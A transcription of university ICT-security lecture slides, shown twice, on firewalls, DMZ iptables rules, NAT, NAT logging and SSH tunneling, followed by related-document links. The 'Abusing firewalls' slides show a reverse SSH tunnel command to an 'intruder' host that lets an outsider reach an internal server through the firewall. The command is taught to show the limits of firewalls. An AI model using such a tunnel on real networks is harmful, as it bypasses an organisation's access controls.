Focus on Security. Keeping the bad guys out

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "Focus on Security. Keeping the bad guys out"

Transcription

1 Focus on Security Keeping the bad guys out

2 3 ICT Security Topics: Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions.

3 4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls

4 5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, ??

5 6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

6 7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

7 8 Firewalls: Setup Basic (Common) Setup:

8 9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

9 10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

10 11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

11 12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

12 13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

13 14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

14 15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned

15 16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

16 17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

17 18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

18 19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

19 20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

20 21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though...

21 22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

22 23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

23 24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

24 25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

25 26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

26 27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

27 28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

28 29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

29 30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

30 31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

31 32 Network Address Translation Concepts: Source NAT the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Incoming Traffic Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

32 33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

33 34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

34 35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router x.y interface router Internet interface x.y range Source NAT: x.y. appears to be the router

35 36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s x.y/24 o eth0 j SNAT \ to source $routerip x.y interface (eth1) router Internet interface (eth0) x.y range Source NAT: x.y. appears to be the router

36 37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

37 38 Network Address Translation Destination NAT (PRE routing) application: x.y range computers behind a router information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

38 39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination x x.y range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

39 40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

40 41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport range x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

41 42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport range

42 43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28: (UTC): :55359 (via: :55359) to :113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12: until Jan 6 12:12:08: (UTC): :3166 (via: :3166) to :80 IPsrc:sport range

43 44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

44 45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

45 46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

46 47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

47 48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

48 49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: a virus transfers ports 80, 443 social engineering a disgruntled employee?... (443) I

49 50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

50 51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

51 52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 I (443)

52 53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

53 54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

54 55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

55 56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

56 57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

57 58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

58 59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

59 60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

60 61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013

61 Focus on Security Keeping the bad guys out

62 3 Topics: ICT Security Day 1: General principles. Day 2: System hardening and integrity. Day 3: Keeping the bad guys out. Day 4: Seeing the invisible; what's passing through the wires? Day 5: Summary and conclusions. Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

63 4 ICT Security Today's topics: Firewalls: principles and implementation Network Address Translation (NAT) Abusing firewalls Security is complex and extensive Only the highlights will be covered during this course Aims: increase awareness, show examples, present framework

64 5 Apply A Firewall Firewalls: Not a cure against all your problems. Is primarily useful to prevent attacks from the outside world aimed at our computers. But... Webbrowsing, ??

65 6 Apply A Firewall Firewalls: Every opening is a hole in the wall Viruses/Worms may leave through the hole; Malignant software may use encryption, and may thus be undistinguishable from `legal' traffic using encryption. Firewalls need maintenance. Who's doing that? Who has the knowledge to do so? Firewalls are bypassed when the user downloads the malware

66 7 Firewalls: Setup Terminology: Bastion Hosts DMZ Firewall Internal Network Multi homed host (Stateful) packet filtering

67 8 Firewalls: Setup Basic (Common) Setup:

68 9 Firewalls: Setup DMZ (Preferred) Setup: Firewall Setup Router Fire wall DMZ External Servers (DNS, Mail Web) Switch Internal Net Workstations Internal Servers (DNS, File, Mail)

69 10 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Internet to/from Internal net DMZ to/from Internal net Internet Internal Net DMZ

70 11 Firewalls: Setup DMZ Communication rules: Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

71 12 Firewalls: Setup DMZ Communication rules: Internet to/from Internal net No new inbound connections No new outbound connections if proxying is at all possible; otherwise be extremely cautious No forwarding Simple plain spoofing protection Internet Internal Net DMZ

72 13 Firewalls: Setup DMZ Communication rules: DMZ to/from Internal net No new connections from the DMZ to workstations New connections only to/from matching services Simple spoofing protection rules No forwarding Internet Internal Net DMZ

73 14 Firewalls: Implementation Iptables is used to implement the firewall Widely available Free software No special hardware required Can be used on a per host or organization level

74 15 Firewalls: Implementation Iptables installation and activation Installation: apt get install iptables Documentation: Activation:./iptables /path/to/rules file The rules file is a simple text file This scheme is usually fine tuned iptables save and iptables restore are usually called from /etc/init.d/iptables at startup to reinstall the firewall as soon as the computer boots. iptables save saves the contents of the iptables to cout. Incantation: iptables save > /var/lib/iptables/active (restore in, e.g., /etc/network/if pre up.d)

75 16 Firewalls: concepts What is input, output and forwarding? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT

76 17 Firewalls: concepts What is input, output and forwarding? Routing Decisions: INPUT or FORWARDING? Incoming Traffic Routing Decision FORWARDING Outgoing Traffic what's the intended destination? INPUT Local Processes OUTPUT Incoming traffic is immediately separated between intended for this computer or not.

77 18 Firewalls: concepts What is input, output and forwarding? INPUT: Incoming Traffic Routing Decision FORWARDING Outgoing Traffic input decisions INPUT Local Processes OUTPUT Traffic entering the computer is intended for the computer itself. Verified at INPUT

78 19 Firewalls: concepts What is input, output and forwarding? OUTPUT Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT output decisions Traffic handled by local processes, is leaving the computer if verified by OUTPUT

79 20 Firewalls: concepts What is input, output and forwarding? FORWARDING Forwarding decisions Incoming Traffic Routing Decision FORWARDING Outgoing Traffic INPUT Local Processes OUTPUT Traffic not intended for local processes is passing through, if verified by FORWARDING

80 21 Firewalls: Rules A simple (and not so desirable) initial file: P OUTPUT ACCEPT F OUTPUT Accept all output connections P INPUT ACCEPT F INPUT P FORWARD ACCEPT F FORWARD Accept all input connections Accept all forwarding connections No filtering of any kind. could be useful, though... as fall back to make visible what you're doing if you're not using a firewall

81 22 Firewalls: Rules Handling IPv6: /sbin/ip6tables flush /sbin/ip6tables delete chain /sbin/ip6tables P OUTPUT DROP /sbin/ip6tables P INPUT DROP /sbin/ip6tables P FORWARD DROP Drop output connections Drop input connections Drop forwarding connections

82 23 Firewalls: Setup DMZ Setup: Firewall Setup Router Fire wall DMZ Servers (smtp, http, https) Switch Internal Net Workstations

83 24 Firewalls: implementing the DMZ Recap: DMZ Communication rules Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding Internet Internal Net DMZ

84 25 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services (e.g., smtp, http, https) P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT

85 26 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections A OUTPUT m state state RELATED,ESTABLISHED j ACCEPT

86 27 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Start the output rules with: P OUTPUT DENY F OUTPUT

87 28 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT

88 29 Firewalls: implementing the DMZ Internet to/from DMZ Incoming only to known services Outbound only part of established connections No new connections originate from the DMZ Simple plain spoofing protection No forwarding P FORWARD DENY F FORWARD

89 30 Firewalls: implementing the DMZ Internet to/from DMZ: the complete setup P INPUT DENY F INPUT A INPUT p tcp dport smtp j ACCEPT A INPUT p tcp dport http j ACCEPT A INPUT p tcp dport https j ACCEPT A INPUT m state state RELATED,ESTABLISHED j ACCEPT P OUTPUT DENY F OUTPUT A OUTPUT s ${DNS name} \ m state state RELATED,ESTABLISHED j ACCEPT P FORWARD DENY F FORWARD

90 31 Firewalls: implementing the DMZ If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf: net.ipv4.conf.default.rp_filter=1 net.ipv4.conf.all.rp_filter=1 net.ipv4.ip_forward=1 # spoofing protection # forward IP4 packets # what it says: net.ipv4.icmp_echo_ignore_broadcasts = 1

91 32 Network Address Translation Concepts: Source NAT Incoming Traffic the source address (i.e., where is the packed coming from) is modified. Just before the packet leaves the box: Postrouting. Example: masquerading Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

92 33 Network Address Translation Concepts: Destination NAT Incoming Traffic the destination address (i.e., where is the packed going to) is modified. Just before the routing decision is made: Prerouting. Example: port forwarding, proxying NAT: prerouting Routing Decision FORWARDING NAT: Postrouting INPUT Local Processes OUTPUT Outgoing Traffic

93 34 Network Address Translation Source NAT: changing the address the packet is coming from, POST routing With POST routing the package leaves the router Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

94 35 Network Address Translation Source NAT (POST routing) application: computers behind a router in a private range information from these computers appear to come from the router x.y interface router Internet interface x.y range Source NAT: x.y. appears to be the router

95 36 Network Address Translation Source NAT (POST routing) application: t nat A POSTROUTING s x.y/24 o eth0 j SNAT \ to source $routerip x.y interface (eth1) router Internet interface (eth0) x.y range Source NAT: x.y. appears to be the router

96 37 Network Address Translation Destination NAT: changing the address the packet is going to, PRE routing. With PRE routing the package enters the router. Application: computers behind a router using a private range all information coming from these computers should appear to be coming from the router.

97 38 Network Address Translation Destination NAT (PRE routing) application: computers behind a router x.y range information sent to the router is relayed to one of the computers in the private range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

98 39 Network Address Translation Destination NAT (PRE routing) application: t nat A PREROUTING p tcp s $MTA IP d $routerip \ dport 25 j DNAT to destination x x.y range trusted MTA router Internet interface x.y interface x.25 Destination NAT: x.25 receives the mail

99 40 Source NAT Logging NATLOG logs the network translations Actions performed by source nat translations: IPsrc:sport range IPsrc:sport is translated by the firewall to IPfw:fwport; IPfw:fwport is used when communicating with IPdst:dport x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

100 41 Source NAT Logging NATLOG logs the network translations Standard log facilities offer complex data NATLOG beautifies the logs from pcap library facilities looking at the interfaces information made available by conntrackd IPsrc:sport range x.y interface (eth1) router IPfw::fwport Internet iface (eth0) Source NAT: x.y. appears to be the origin

101 42 Source NAT Logging NATLOG logs the network translations Two activation commands: natlog indevice outdevice (e.g. natlog eth1 eth0) natlog conntrack (requires conntrack installed) Syslog logs may be sent to a dedicated natlog.log :syslogtag, isequal, "NATLOG:" /var/log/natlog.log :syslogtag, isequal, "NATLOG:" ~ IPsrc:sport range

102 43 Source NAT Logging NATLOG logs the network translations Examples of some log entries: Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28: (UTC): :55359 (via: :55359) to :113 Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12: until Jan 6 12:12:08: (UTC): :3166 (via: :3166) to :80 IPsrc:sport range

103 44 Firewalls and tunnels The concept Enter at one end Reappear at the other end

104 45 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol Often: ssh is used In real life firewalls allow at least some outgoing connections (http, https, smtp)

105 46 Firewalls and tunnels Tunnels: the concept, as used in Information Technology: Often: ssh is used. Connect to a remote computer's service, using a secure tunnel Allow remote computer's local connections to access a remote computer's service What this boils down to...

106 47 Firewalls and tunnels The situation: Workstation and Server (offering sensitive service at port 143, behind a firewall) Firewall accepts only traffic on ports 80 and 443 Trusted local area network Intruder (located outside the firewall) W (143) S Firewall: transfers ports 80, 443 I

107 48 Firewalls and tunnels The Intruder: (143) At the intruder an ssh daemon runs watching port 443 (e.g., sshd p 443) W S Firewall: transfers ports 80, 443 provides ssh-daemon watching port 443 I

108 49 Firewalls and tunnels Malware: At the workstation the shown ssh command is executed, using: a virus social engineering a disgruntled employee?... W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 I (443)

109 50 Firewalls and tunnels Setting up the tunnel: Ssh connects through the firewall to port 443 at intruder W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 (443) I

110 51 Firewalls and tunnels (Ab)using the tunnel: A client at intruder connects using intruder's local port 1443 W ssh -p 443 -R 1443:server:143 intruder (143) S Firewall: transfers ports 80, 443 client connecting to local port 1443 (443) I

111 52 Firewalls and tunnels Tunnels: A secure tunnel is now established through the workstation, W allowing the accessor to use the server's service 143 directly. The firewall offers no protection. client connecting to local port 1443 ssh -p 443 -R 1443:server:143 ssh -p 443 -R 1443:server:143 intruder intruder (143) S Firewall: transfers ports 80, 443 I (443)

112 53 Firewalls and tunnels Why tunneling Tunnels to secure inherently insecure protocols (pop, daytime,...) As a side effect: the hacker can use the tools too... Less serious applications: X11 tunneling (see the SSH documentation) Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

113 54 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:localhost:13 remote host forward connections from port 1313 at the local host

114 55 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example: ssh L 1313:remote host:13 remote host forward connections from port 1313 at the local host to port 13 at remote host.

115 56 Firewalls and tunnels Tunnels: Allowing insecure services, running locally, to be accessed through an encrypted tunnel. 2 nd Example: ssh L 1313:alternate host:13 remote host connect to port 13 at alternate host, succeeding if remote host allows us to connect to alternate host's port 13. The connection between localhost and remote host is secure. Not between remote host and alternate host. Note: Use g to access port 1313 from any host.

116 57 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (1): ssh L 1313:some host:13 remote host Connections to localhost:1313 are forwarded using ssh to remote host, and from there to somehost:13. some host may be remote host The g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!)

117 58 Firewalls and tunnels Ssh tunnels: a summary: Securing insecure protocols (2): ssh remote host R 1234:some host:80 Connections from remote host:1234 to the computer issuing the ssh command are encrypted and from there forwarded to some host:80

118 59 Focus on Security Today's topics: Firewalls: principles and implementation Network Address Translation Abusing firewalls Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts They offer no protection against abuse caused by infections (possibly caused by users)

119 60 Focus on Security Day 4: Seeing the invisible The bottom line: tcpdump The applications: Wireshark OpenVAS

120 61 Focus on Security Keeping the bad guys out (?) dr. Frank B. Brokken Center of Information Technology University of Groningen 2013

Linux firewall. Need of firewall Single connection between network Allows restricted traffic between networks Denies un authorized users

Linux firewall. Need of firewall Single connection between network Allows restricted traffic between networks Denies un authorized users Linux firewall Need of firewall Single connection between network Allows restricted traffic between networks Denies un authorized users Linux firewall Linux is a open source operating system and any firewall

More information

Chapter 7. Firewalls http://www.redhat.com/docs/manuals/enterprise/rhel-4-manual/security-guide/ch-fw.html

Chapter 7. Firewalls http://www.redhat.com/docs/manuals/enterprise/rhel-4-manual/security-guide/ch-fw.html Red Hat Docs > Manuals > Red Hat Enterprise Linux Manuals > Red Hat Enterprise Linux 4: Security Guide Chapter 7. Firewalls http://www.redhat.com/docs/manuals/enterprise/rhel-4-manual/security-guide/ch-fw.html

More information

Firewall. IPTables and its use in a realistic scenario. José Bateira ei10133 Pedro Cunha ei05064 Pedro Grilo ei09137 FEUP MIEIC SSIN

Firewall. IPTables and its use in a realistic scenario. José Bateira ei10133 Pedro Cunha ei05064 Pedro Grilo ei09137 FEUP MIEIC SSIN Firewall IPTables and its use in a realistic scenario FEUP MIEIC SSIN José Bateira ei10133 Pedro Cunha ei05064 Pedro Grilo ei09137 Topics 1- Firewall 1.1 - How they work? 1.2 - Why use them? 1.3 - NAT

More information

1:1 NAT in ZeroShell. Requirements. Overview. Network Setup

1:1 NAT in ZeroShell. Requirements. Overview. Network Setup 1:1 NAT in ZeroShell Requirements The version of ZeroShell used for writing this document is Release 1.0.beta11. This document does not describe installing ZeroShell, it is assumed that the user already

More information

Track 2 Workshop PacNOG 7 American Samoa. Firewalling and NAT

Track 2 Workshop PacNOG 7 American Samoa. Firewalling and NAT Track 2 Workshop PacNOG 7 American Samoa Firewalling and NAT Core Concepts Host security vs Network security What is a firewall? What does it do? Where does one use it? At what level does it function?

More information

Linux Routers and Community Networks

Linux Routers and Community Networks Summer Course at Mekelle Institute of Technology. July, 2015. Linux Routers and Community Networks Llorenç Cerdà-Alabern http://personals.ac.upc.edu/llorenc llorenc@ac.upc.edu Universitat Politènica de

More information

Linux Firewall Wizardry. By Nemus

Linux Firewall Wizardry. By Nemus Linux Firewall Wizardry By Nemus The internet and your server So then what do you protect your server with if you don't have a firewall in place? NetFilter / Iptables http://www.netfilter.org Iptables

More information

Firewalls (IPTABLES)

Firewalls (IPTABLES) Firewalls (IPTABLES) Objectives Understand the technical essentials of firewalls. Realize the limitations and capabilities of firewalls. To be familiar with iptables firewall. Introduction: In the context

More information

CS 5410 - Computer and Network Security: Firewalls

CS 5410 - Computer and Network Security: Firewalls CS 5410 - Computer and Network Security: Firewalls Professor Kevin Butler Fall 2015 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire, heat

More information

Module II. Internet Security. Chapter 6. Firewall. Web Security: Theory & Applications. School of Software, Sun Yat-sen University

Module II. Internet Security. Chapter 6. Firewall. Web Security: Theory & Applications. School of Software, Sun Yat-sen University Module II. Internet Security Chapter 6 Firewall Web Security: Theory & Applications School of Software, Sun Yat-sen University Outline 6.1 Introduction to Firewall What Is a Firewall Types of Firewall

More information

CS 5410 - Computer and Network Security: Firewalls

CS 5410 - Computer and Network Security: Firewalls CS 5410 - Computer and Network Security: Firewalls Professor Patrick Traynor Spring 2015 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

CSC574 - Computer and Network Security Module: Firewalls

CSC574 - Computer and Network Security Module: Firewalls CSC574 - Computer and Network Security Module: Firewalls Prof. William Enck Spring 2013 1 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

Internet infrastructure. Prof. dr. ir. André Mariën

Internet infrastructure. Prof. dr. ir. André Mariën Internet infrastructure Prof. dr. ir. André Mariën (c) A. Mariën 31/01/2006 Topic Firewalls (c) A. Mariën 31/01/2006 Firewalls Only a short introduction See for instance: Building Internet Firewalls, second

More information

CSE543 - Computer and Network Security Module: Firewalls

CSE543 - Computer and Network Security Module: Firewalls CSE543 - Computer and Network Security Module: Firewalls Professor Trent Jaeger Fall 2010 1 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

CSE331: Introduction to Networks and Security. Lecture 12 Fall 2006

CSE331: Introduction to Networks and Security. Lecture 12 Fall 2006 CSE331: Introduction to Networks and Security Lecture 12 Fall 2006 Announcements Midterm I will be held Friday, Oct. 6th. True/False Multiple Choice Calculation Short answer Short essay Project 2 is on

More information

Firewall implementation and testing

Firewall implementation and testing Firewall implementation and testing Patrik Ragnarsson, Niclas Gustafsson E-mail: ragpa737@student.liu.se, nicgu594@student.liu.se Supervisor: David Byers, davby@ida.liu.se Project Report for Information

More information

allow all such packets? While outgoing communications request information from a

allow all such packets? While outgoing communications request information from a FIREWALL RULES Firewalls operate by examining a data packet and performing a comparison with some predetermined logical rules. The logic is based on a set of guidelines programmed in by a firewall administrator,

More information

Firewalls. Chien-Chung Shen cshen@cis.udel.edu

Firewalls. Chien-Chung Shen cshen@cis.udel.edu Firewalls Chien-Chung Shen cshen@cis.udel.edu The Need for Firewalls Internet connectivity is essential however it creates a threat vs. host-based security services (e.g., intrusion detection), not cost-effective

More information

Proxy Server, Network Address Translator, Firewall

Proxy Server, Network Address Translator, Firewall For Summer Training on Computer Networking visit Proxy Server, Network Address Translator, Firewall Prepared by : Swapan Purkait Director Nettech Private Limited swapan@nettech.in + 91 93315 90003 Proxy

More information

Networking Basics and Network Security

